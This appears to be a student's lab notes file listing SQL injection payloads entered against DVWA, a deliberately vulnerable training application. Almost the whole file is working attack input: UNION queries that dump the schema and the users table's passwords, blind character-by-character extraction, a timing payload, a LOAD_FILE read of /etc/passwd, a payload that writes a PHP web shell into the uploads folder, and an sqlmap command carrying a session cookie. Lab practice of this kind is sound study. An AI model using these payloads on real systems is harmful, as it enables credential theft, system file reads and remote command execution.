sqli.md

User ID: ' OR 1=1 #
User ID: ' OR 1=1 ORDER BY 1 #
User ID: 6' UNION SELECT 1,2 #
First name: 1
Surname: 2
User ID: 6' UNION SELECT database(),current_user() #
First name: dvwa
Surname: dvwa@localhost
User ID: 6' UNION SELECT table_name,2
  FROM INFORMATION_SCHEMA.TABLES
  WHERE TABLE_SCHEMA = 'dvwa' #
User ID: 6' UNION SELECT column_name,2
  FROM INFORMATION_SCHEMA.COLUMNS
  WHERE TABLE_SCHEMA = 'dvwa' #
User ID: 6' UNION SELECT user,password FROM users #
User ID: ' OR 1=1 #
User ID: 1 OR 1=1 #
User ID: 6' ... #
User ID: 6 ... #
User ID: 1
User ID exists in the database.
User ID: 6
User ID is MISSING from the database.
User ID: 1' AND '1' = '2' #
User ID is MISSING from the database.
User ID: 1' AND '1' = '1' #
User ID exists in the database.
1' AND ORD(MID(DATABASE(),1,1)) = 100 #
1' AND LENGTH(DATABASE()) = 4 #
1' AND ORD(MID(DATABASE(),1,1)) = 100 # d
1' AND ORD(MID(DATABASE(),2,1)) = 118 # v
1' AND ORD(MID(DATABASE(),3,1)) = 119 # w
1' AND ORD(MID(DATABASE(),4,1)) = 97  # a
1' AND ORD(MID((SELECT table_name
FROM INFORMATION_SCHEMA.TABLES
WHERE table_schema='dvwa' LIMIT 0,1),1,1)) = 103 # g
1' AND ORD(MID((SELECT COUNT(column_name)
FROM INFORMATION_SCHEMA.COLUMNS
WHERE table_name='users'
AND table_schema='dvwa'),1,1)) = 56 # 8 -> 56 => 8
1' AND ORD(MID((SELECT column_name
FROM INFORMATION_SCHEMA.COLUMNS
WHERE table_name='users'
AND table_schema='dvwa' LIMIT 4,1),1,1)) = 112 # p
1' AND ORD(MID((SELECT password FROM dvwa.users
WHERE user='Pablo'),1,1)) = 48 # 0
User ID: 1' ... #
User ID: 1 ... #
User ID: 1' AND 1=0 UNION SELECT NULL,
benchmark(5000000, encode('MSG', 'pass-phrase'))
FROM users #
User ID: 6' UNION SELECT NULL, LOAD_FILE("/etc/passwd") #
User ID: 6' UNION SELECT NULL, "<?php system(\$_GET[cmd]) ?>"
  INTO DUMPFILE "/var/www/DVWA/hackable/uploads/shell.php" #
sqlmap --url "https://vm-etu-vimazeno.local.isima.fr/vulnerabilities/sqli/?id= #;"
--cookie="PHPSESSID=ss07hir39n0drbanfiqh6rt7e2; security=low"
--tables